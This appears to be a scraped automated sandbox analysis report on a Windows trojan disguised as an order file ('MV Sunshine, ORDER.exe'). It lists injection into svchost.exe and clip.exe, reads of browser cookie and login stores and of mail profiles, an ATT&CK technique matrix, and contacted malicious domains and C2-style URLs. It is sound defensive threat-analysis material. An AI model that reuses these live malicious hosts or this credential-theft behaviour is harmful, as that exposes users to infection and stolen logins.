            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: MV Sunshine, ORDER.exeBinary or memory string: WIN_81
            Source: MV Sunshine, ORDER.exeBinary or memory string: WIN_XP
            Source: MV Sunshine, ORDER.exeBinary or memory string: WIN_XPe
            Source: MV Sunshine, ORDER.exeBinary or memory string: WIN_VISTA
            Source: MV Sunshine, ORDER.exeBinary or memory string: WIN_7
            Source: MV Sunshine, ORDER.exeBinary or memory string: WIN_8
            Source: MV Sunshine, ORDER.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_009F6596
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_009F6A5A
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets151
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1491394 Sample: MV Sunshine, ORDER.exe Startdate: 12/08/2024 Architecture: WINDOWS Score: 100 28 www.tinmapco.com 2->28 30 www.hatercoin.online 2->30 32 13 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 7 other signatures 2->48 10 MV Sunshine, ORDER.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 QAjjirwAoAEExvw.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 clip.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 QAjjirwAoAEExvw.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.anuts.top 23.251.54.212, 49756, 49757, 49758 VPSQUANUS United States 22->34 36 parkingpage.namecheap.com 91.195.240.19, 49768, 49769, 49770 SEDO-ASDE Germany 22->36 38 9 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            MV Sunshine, ORDER.exe37%ReversingLabsWin32.Trojan.Strab
            MV Sunshine, ORDER.exe31%VirustotalBrowse
            MV Sunshine, ORDER.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            www.sandranoll.com11%VirustotalBrowse
            www.dmtxwuatbz.cc2%VirustotalBrowse
            www.xn--matfrmn-jxa4m.se0%VirustotalBrowse
            www.catherineviskadi.com1%VirustotalBrowse
            www.anuts.top7%VirustotalBrowse
            www.bfiworkerscomp.com0%VirustotalBrowse
            www.helpers-lion.online0%VirustotalBrowse
            www.xn--fhq1c541j0zr.com0%VirustotalBrowse
            parkingpage.namecheap.com0%VirustotalBrowse
            www.hprlz.cz1%VirustotalBrowse
            www.gipsytroya.com1%VirustotalBrowse
            www.hatercoin.online2%VirustotalBrowse
            www.telwisey.info2%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/?ZH3=yf1H3v6h&YXDT=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=0%Avira URL Cloudsafe
            https://dts.gnpge.com0%Avira URL Cloudsafe
            https://reg.ru0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://reg.ru0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.xn--matfrmn-jxa4m.se/4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6h100%Avira URL Cloudmalware
            https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto0%VirustotalBrowse
            http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=RVFsMXVZQ01zWVBtemVpNk84WGZGRFNKclVyQWVYYVJiaVZY0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&0%Avira URL Cloudsafe
            http://www.xn--fhq1c541j0zr.com/rm91/0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/0%Avira URL Cloudsafe
            https://dts.gnpge.com0%VirustotalBrowse
            http://www.gipsytroya.com/tf44/?YXDT=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&ZH3=yf1H3v6h0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&0%VirustotalBrowse
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/0%VirustotalBrowse
            https://static.loopia.se/responsive/images/iOS-72.png0%VirustotalBrowse
            http://www.xn--fhq1c541j0zr.com/rm91/0%VirustotalBrowse
            http://www.telwisey.info/ei85/?YXDT=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&ZH3=yf1H3v6h0%Avira URL Cloudsafe
            https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/px.js?ch=20%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking1%VirustotalBrowse
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%VirustotalBrowse
            https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%VirustotalBrowse
            http://www.bfiworkerscomp.com/px.js?ch=10%Avira URL Cloudsafe
            https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_0%VirustotalBrowse
            https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&amp;YXDT=0lpTRQcDUH0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=0%VirustotalBrowse
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc/lfkn/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe1%VirustotalBrowse
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw1%VirustotalBrowse
            http://www.xn--fhq1c541j0zr.com/rm91/?ZH3=yf1H3v6h&YXDT=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%VirustotalBrowse
            http://www.sandranoll.com/aroo/100%Avira URL Cloudmalware
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
            https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/4hda/100%Avira URL Cloudmalware
            https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
            http://www.telwisey.info/ei85/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.sandranoll.com/aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=100%Avira URL Cloudmalware
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan0%Avira URL Cloudsafe
            http://www.catherineviskadi.com/qe66/?YXDT=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&ZH3=yf1H3v6h0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc/lfkn/?YXDT=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&ZH3=yf1H3v6h0%Avira URL Cloudsafe
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            http://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
            http://www.anuts.top/li0t/?ZH3=yf1H3v6h&YXDT=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg=0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png0%Avira URL Cloudsafe
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.catherineviskadi.com/qe66/0%Avira URL Cloudsafe
            https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc0%Avira URL Cloudsafe
            http://www.anuts.top/li0t/0%Avira URL Cloudsafe
            https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.helpers-lion.online/mooq/0%Avira URL Cloudsafe
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sandranoll.com
            213.145.228.16
            truefalseunknown
            www.dmtxwuatbz.cc
            104.21.45.56
            truefalseunknown
            www.xn--matfrmn-jxa4m.se
            194.9.94.85
            truefalseunknown
            www.catherineviskadi.com
            217.160.0.106
            truefalseunknown
            www.anuts.top
            23.251.54.212
            truefalseunknown
            www.helpers-lion.online
            194.58.112.174
            truefalseunknown
            www.bfiworkerscomp.com
            208.91.197.27
            truefalseunknown
            parkingpage.namecheap.com
            91.195.240.19
            truefalseunknown
            www.telwisey.info
            199.192.19.19
            truefalseunknown
            www.hprlz.cz
            5.44.111.162
            truefalseunknown
            www.xn--fhq1c541j0zr.com
            43.252.167.188
            truefalseunknown
            www.fourgrouw.cfd
            unknown
            unknowntrue
              unknown
              www.hatercoin.online
              unknown
              unknowntrueunknown
              www.tinmapco.com
              unknown
              unknowntrue
                unknown
                www.gipsytroya.com
                unknown
                unknowntrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://www.bfiworkerscomp.com/xzzi/?ZH3=yf1H3v6h&YXDT=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=false
                • Avira URL Cloud: safe
                unknown
                http://www.xn--matfrmn-jxa4m.se/4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6hfalse
                • Avira URL Cloud: malware
                unknown
                http://www.xn--fhq1c541j0zr.com/rm91/false
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.bfiworkerscomp.com/xzzi/false
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.gipsytroya.com/tf44/?YXDT=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&ZH3=yf1H3v6hfalse
                • Avira URL Cloud: safe
                unknown
                http://www.telwisey.info/ei85/?YXDT=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&ZH3=yf1H3v6hfalse
                • Avira URL Cloud: safe
                unknown
                http://www.dmtxwuatbz.cc/lfkn/false
                • Avira URL Cloud: safe
                unknown
                http://www.xn--fhq1c541j0zr.com/rm91/?ZH3=yf1H3v6h&YXDT=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=false
                • Avira URL Cloud: safe
                unknown
                http://www.sandranoll.com/aroo/true
                • Avira URL Cloud: malware
                unknown
                http://www.gipsytroya.com/tf44/false
                • Avira URL Cloud: safe
                unknown
                http://www.xn--matfrmn-jxa4m.se/4hda/false
                • Avira URL Cloud: malware
                unknown
                http://www.telwisey.info/ei85/false
                • Avira URL Cloud: safe
                unknown
                http://www.sandranoll.com/aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=true
                • Avira URL Cloud: malware
                unknown
                http://www.catherineviskadi.com/qe66/?YXDT=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&ZH3=yf1H3v6hfalse
                • Avira URL Cloud: safe
                unknown
                http://www.dmtxwuatbz.cc/lfkn/?YXDT=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&ZH3=yf1H3v6hfalse
                • Avira URL Cloud: safe
                unknown
                http://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=false
                • Avira URL Cloud: safe
                unknown
                http://www.anuts.top/li0t/?ZH3=yf1H3v6h&YXDT=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg=false
                • Avira URL Cloud: safe
                unknown
                http://www.catherineviskadi.com/qe66/false
                • Avira URL Cloud: safe
                unknown
                http://www.anuts.top/li0t/false
                • Avira URL Cloud: safe
                unknown
                http://www.helpers-lion.online/mooq/false
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabclip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_autoclip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://dts.gnpge.comQAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://duckduckgo.com/ac/?q=clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://reg.ruclip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=RVFsMXVZQ01zWVBtemVpNk84WGZGRFNKclVyQWVYYVJiaVZYclip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssclip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
